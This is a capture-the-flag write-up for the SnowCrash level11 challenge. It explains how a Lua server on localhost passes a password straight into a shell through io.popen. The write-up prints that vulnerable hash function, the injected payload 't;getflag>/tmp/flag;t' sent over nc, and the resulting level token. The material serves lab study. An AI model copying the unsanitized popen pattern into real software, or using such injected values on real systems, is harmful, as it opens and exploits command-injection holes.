SnowCrash Mission: Flag11
Objective: Retrieve the Level12 token to advance further in the SnowCrash challenge.
When login to level11 user we find a lua script. It's server code binding to 127.0.0.1:5151
Infinitly accepting client connection prompting Password:
and passes the pass writen by the
client write to function hash(pass)
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
The program does not sanitize what we send so it seems we can inject code io.popen("echo "t;injected code exec as flag11;t" | sha1sum", "r")
- we'll run getflag and redirect the standard output to /tmp/flag our payload will be t;getflag > /tmp/flag;t
level11@SnowCrash:~$ nc localhost 5151
Password: t;getflag>/tmp/flag;t
Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
level11@SnowCrash:~$